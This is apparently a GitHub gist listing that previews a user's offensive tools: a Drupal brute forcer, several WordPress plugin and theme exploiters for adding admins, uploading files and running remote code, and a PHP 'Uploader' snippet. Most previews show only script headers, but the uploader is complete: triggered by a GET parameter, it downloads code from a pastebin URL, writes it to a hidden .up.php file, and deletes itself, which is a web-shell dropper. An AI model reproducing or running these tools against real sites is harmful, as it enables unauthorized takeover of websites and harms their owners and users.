Skip to content

Instantly share code, notes, and snippets.

@mranarshit
mranarshit / Drupal brute force
Last active May 17, 2022 23:49
Drupal Brute Force
#!/usr/bin/perl -
# install parallel::forkmanager module sudo apt-get install libparallel-forkmanager-perl
# or cpan Parallel::ForkManager
#
use strict;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Parallel::ForkManager;
use URI::Escape;
@mranarshit
mranarshit / WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) Exploiter
Created March 25, 2015 14:55
WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) Exploiter
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By M-A
# Greet's : My Brother Rab3oun & Boy & All Sec4ever Menber
# Perl Lov3r :)
my $datestring = localtime();
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
@mranarshit
mranarshit / WP Reflex-Gallery File Upload Exploiter
Last active August 29, 2015 14:17
WP Reflex-Gallery File Upload Exploiter
@mranarshit
mranarshit / Uploader
Last active November 17, 2016 12:19
Uploader
<?
if ($_GET['cmd']=="up")
{
echo "OK";
$path = $_SERVER["DOCUMENT_ROOT"];
$c=file_get_contents("http://pastebin.com/XVhLHWye");
$fh = fopen(".up.php", 'w') ;
fwrite($fh,$c) ;
unlink(__FILE__);
}
@mranarshit
mranarshit / Wordpress Theme DesignFolio File Upload Exploiter
Created March 15, 2015 10:30
Wordpress Theme DesignFolio File Upload Exploiter
#!/usr/bin/perl -w
# Wordpress Theme DesignFolio File Upload Exploiter :)
# C0ded by Mr_AnarShi-T (M-A)
# (c) Janissaries.org
# GreeT's : All Friend Specially Rab3oun :)
use strict;
use LWP::UserAgent;
use Digest::MD5 qw(md5 md5_hex);
use MIME::Base64;
use IO::Socket;
@mranarshit
mranarshit / 0day - Add Admin v2
Created February 17, 2015 17:30
0day - Add Admin v2
#!/usr/bin/perl -w
# Coded By M-A
# Greet's : My Brother Rab3oun & Boy & All Sec4ever Menber
# (c) Jannissaries.org & Sec4ever.com
# Perl Lov3r :)
use strict;
use HTTP::Request;
use Digest::MD5;
use LWP::UserAgent;
use URI::Split qw/ uri_split uri_join /;
@mranarshit
mranarshit / 0day - Add Admin
Last active October 13, 2018 22:21
Wordpress 0day - Add Administrator
#!/usr/bin/perl -w
# Coded By M-A
# Greet's : My Brother Rab3oun & Boy & All Sec4ever Menber
# (c) Jannissaries.org & Sec4ever.com
# Perl Lov3r :)
use strict;
use HTTP::Request;
use LWP::UserAgent;
use URI::Split qw/ uri_split uri_join /;
my $datestring = localtime();
@mranarshit
mranarshit / Wordpress Download Manager 2.7.4 Add Admin Exploiter
Created January 21, 2015 12:29
Wordpress Download Manager 2.7.4 Add Admin Exploiter
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By M-A
# Greet's : My Brother Rab3oun & Boy & All Sec4ever Menber
# Perl Lov3r :)
my $datestring = localtime();
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
@mranarshit
mranarshit / [Perl] Satoshi Theme Exploiter
Last active August 29, 2015 14:13
[Perl] Satoshi Theme Exploiter
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By M-A
# Greet's : My Brother Boy & MMxM & Rab3oun & All Sec4ever Menber
# Perl Lov3r :)
my $qqvul ="/upload-file.php";#theme path vul
my $datestring = localtime();
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
sub randomagent {